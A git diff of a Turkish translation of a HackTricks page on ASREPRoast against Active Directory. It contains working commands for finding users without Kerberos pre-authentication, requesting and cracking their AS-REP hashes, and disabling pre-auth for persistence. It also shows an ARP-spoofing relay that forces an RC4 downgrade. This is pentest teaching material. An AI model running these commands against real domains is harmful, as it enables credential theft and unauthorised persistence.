mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
Translated ['windows-hardening/active-directory-methodology/asreproast.m
This commit is contained in:
parent
43d9c5a70d
commit
e71e711ad8
1 changed files with 52 additions and 35 deletions
|
@ -2,64 +2,68 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS hackleme becerilerinizi sıfırdan ileri seviyeye taşıyın</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile</strong>!</summary>
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'ı takip edin**.
|
||||
* **Hacking hilelerinizi paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek** katkıda bulunun.
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da **takip edin**.
|
||||
* **Hacking püf noktalarınızı paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Deneyimli hackerlar ve ödül avcılarıyla iletişim kurmak için [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) sunucusuna katılın!
|
||||
Deneyimli hackerlar ve ödül avcıları ile iletişim kurmak için [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) sunucusuna katılın!
|
||||
|
||||
**Hacking İçgörüleri**\
|
||||
Hacking'in heyecanına ve zorluklarına dalmış içeriklerle etkileşim kurun
|
||||
**Hackleme İçgörüleri**\
|
||||
Hackleme heyecanını ve zorluklarını inceleyen içeriklerle etkileşime geçin
|
||||
|
||||
**Gerçek Zamanlı Hack Haberleri**\
|
||||
Hızlı tempolu hacking dünyasını gerçek zamanlı haberler ve içgörülerle takip edin
|
||||
Hızlı tempolu hackleme dünyasında gerçek zamanlı haberler ve içgörülerle güncel kalın
|
||||
|
||||
**En Son Duyurular**\
|
||||
Yeni ödül avcılarının başlatıldığı ve önemli platform güncellemelerinin olduğu en son duyurularla bilgilenin
|
||||
Yeni ödül avı başlatmaları ve önemli platform güncellemeleri hakkında bilgilenin
|
||||
|
||||
**Bize katılın** [**Discord**](https://discord.com/invite/N3FrSbmwdy) ve bugün en iyi hackerlarla işbirliği yapmaya başlayın!
|
||||
**Bize katılın** [**Discord**](https://discord.com/invite/N3FrSbmwdy) ve bugün en iyi hackerlarla işbirliğine başlayın!
|
||||
|
||||
## ASREPRoast
|
||||
|
||||
ASREPRoast, **Kerberos ön kimlik doğrulama gerekliliği** olmayan kullanıcıları hedef alan bir güvenlik saldırısıdır. Temel olarak, bu zafiyet saldırganlara kullanıcının şifresine ihtiyaç duymadan Domain Controller (DC) üzerinden kullanıcının kimlik doğrulamasını isteme imkanı sağlar. DC daha sonra kullanıcının şifreden türetilen anahtarla şifrelenmiş bir mesajla yanıt verir ve saldırganlar bu mesajı çevrimdışı olarak kırarak kullanıcının şifresini keşfetmeye çalışabilir.
|
||||
ASREPRoast, **Kerberos ön kimlik doğrulaması gereken öznitelik** eksikliği olan kullanıcıları hedef alan bir güvenlik saldırısıdır. Temelde, bu zafiyet saldırganların, kullanıcının şifresine ihtiyaç duymadan Bir Alan Denetleyicisinden (DC) bir kullanıcı için kimlik doğrulaması istemesine olanak tanır. DC daha sonra, saldırganların kullanıcının şifresini keşfetmek için çevrimdışı kırma denemesinde bulunabilecekleri, kullanıcının şifresinden türetilen anahtarla şifrelenmiş bir ileti ile yanıt verir.
|
||||
|
||||
Bu saldırı için temel gereksinimler şunlardır:
|
||||
- **Kerberos ön kimlik doğrulama gerekliliğinin olmaması**: Hedef kullanıcıların bu güvenlik özelliğinin etkin olmaması gerekmektedir.
|
||||
- **Domain Controller (DC) ile bağlantı**: Saldırganların istek göndermek ve şifrelenmiş mesajları almak için DC'ye erişime ihtiyacı vardır.
|
||||
- **İsteğe bağlı etki alanı hesabı**: Bir etki alanı hesabı, saldırganların LDAP sorguları aracılığıyla daha verimli bir şekilde zafiyete açık kullanıcıları belirlemesine olanak tanır. Böyle bir hesap olmadan saldırganlar kullanıcı adlarını tahmin etmek zorundadır.
|
||||
Bu saldırı için ana gereksinimler şunlardır:
|
||||
- **Kerberos ön kimlik doğrulamasının eksikliği**: Hedef kullanıcıların bu güvenlik özelliğine sahip olmaması gerekir.
|
||||
- **Alan Denetleyicisine (DC) bağlantı**: Saldırganların istek göndermek ve şifrelenmiş iletileri almak için DC'ye erişime ihtiyacı vardır.
|
||||
- **İsteğe bağlı alan hesabı**: Bir alan hesabına sahip olmak, saldırganların LDAP sorguları aracılığıyla daha verimli bir şekilde savunmasız kullanıcıları tanımlamasına olanak tanır. Böyle bir hesaba sahip olmayan saldırganlar, kullanıcı adlarını tahmin etmek zorundadır.
|
||||
|
||||
|
||||
#### Zafiyete açık kullanıcıları sıralama (etki alanı kimlik bilgilerine ihtiyaç duyar)
|
||||
#### Savunmasız kullanıcıları sıralama (alan kimlik bilgilerine ihtiyaç duyar)
|
||||
|
||||
{% code title="Windows kullanarak" %}
|
||||
{% code title="Windows Kullanarak" %}
|
||||
```bash
|
||||
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
{% code title="Linux Kullanarak" %}
|
||||
```bash
|
||||
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
#### AS\_REP mesajı isteği
|
||||
#### AS\_REP mesajını iste
|
||||
|
||||
{% code title="Linux kullanarak" %}
|
||||
{% code title="Linux Kullanarak" %}
|
||||
```bash
|
||||
#Try all the usernames in usernames.txt
|
||||
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
|
||||
#Use domain creds to extract targets and target them
|
||||
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
{% code title="Windows Kullanımı" %}
|
||||
```bash
|
||||
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
|
||||
|
@ -68,28 +72,41 @@ Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github
|
|||
{% endcode %}
|
||||
|
||||
{% hint style="warning" %}
|
||||
Rubeus ile AS-REP Roasting yapmak, şifreleme türü 0x17 ve ön kimlik doğrulama türü 0 olan bir 4768 oluşturacaktır.
|
||||
Rubeus ile AS-REP Roasting işlemi, şifreleme türü 0x17 ve ön kimlik doğrulama türü 0 olan bir 4768 oluşturacaktır.
|
||||
{% endhint %}
|
||||
|
||||
### Kırma
|
||||
### Kırılması
|
||||
```bash
|
||||
john --wordlist=passwords_kerb.txt hashes.asreproast
|
||||
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
|
||||
```
|
||||
### Kalıcılık
|
||||
|
||||
**GenericAll** izinlerine (veya özellik yazma izinlerine) sahip olduğunuz bir kullanıcı için **preauth** zorunlu değilse:
|
||||
**GenericAll** izinlerine sahip olduğunuz bir kullanıcı için **preauth** zorunlu değilse (veya özellikler yazma izinleriniz varsa):
|
||||
|
||||
{% code title="Windows kullanarak" %}
|
||||
{% code title="Windows Kullanarak" %}
|
||||
```bash
|
||||
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
{% code title="Linux Kullanarak" %}
|
||||
```bash
|
||||
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH
|
||||
```
|
||||
{% endcode %}
|
||||
## Kimlik bilgileri olmadan ASreproast
|
||||
Kerberos ön kimlik doğrulaması gerektirmeyen kullanıcıların bilgisi olmadan. Bir saldırgan, ağ üzerinde dolaşırken AS-REP paketlerini yakalamak için bir adam ortasında konum kullanabilir.<br>
|
||||
[ASrepCatcher](https://github.com/Yaxxine7/ASrepCatcher) bize bunu yapma imkanı tanır. Dahası, araç Kerberos müzakeresini değiştirerek <ins>istemci iş istasyonlarını RC4 kullanmaya zorlar</ins>.
|
||||
```bash
|
||||
# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
|
||||
ASRepCatcher.py relay -dc $DC_IP --keep-spoofing
|
||||
|
||||
# Disabling ARP spoofing, the mitm position must be obtained differently
|
||||
ASRepCatcher.py relay -dc $DC_IP --disable-spoofing
|
||||
|
||||
# Passive listening of AS-REP packets, no packet alteration
|
||||
ASrepCatcher.py listen
|
||||
```
|
||||
## Referanslar
|
||||
|
||||
* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
|
||||
|
@ -98,29 +115,29 @@ bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac
|
|||
|
||||
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Deneyimli hackerlar ve ödül avcıları ile iletişim kurmak için [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) sunucusuna katılın!
|
||||
[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) sunucusuna katılın ve deneyimli hackerlar ve ödül avcıları ile iletişim kurun!
|
||||
|
||||
**Hacking İçgörüleri**\
|
||||
Hacking'in heyecanına ve zorluklarına dalmış içeriklerle etkileşim kurun
|
||||
Hacking'in heyecanını ve zorluklarını ele alan içeriklerle etkileşime geçin
|
||||
|
||||
**Gerçek Zamanlı Hack Haberleri**\
|
||||
Hızlı tempolu hacking dünyasını gerçek zamanlı haberler ve içgörülerle takip edin
|
||||
|
||||
**En Son Duyurular**\
|
||||
Yeni ödül avları başlatma ve önemli platform güncellemeleri hakkında bilgi edinin
|
||||
Yeni ödül avı başlatmaları ve önemli platform güncellemeleri hakkında bilgilenin
|
||||
|
||||
**Bize** [**Discord**](https://discord.com/invite/N3FrSbmwdy) **katılın ve bugün en iyi hackerlarla işbirliği yapmaya başlayın!**
|
||||
**Bize** [**Discord**](https://discord.com/invite/N3FrSbmwdy) **katılın ve bugün en iyi hackerlarla işbirliğine başlayın!**
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Sıfırdan kahraman olacak şekilde AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* Şirketinizi **HackTricks'te reklam vermek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
|
||||
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'u takip edin.**
|
||||
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
|
Loading…
Reference in a new issue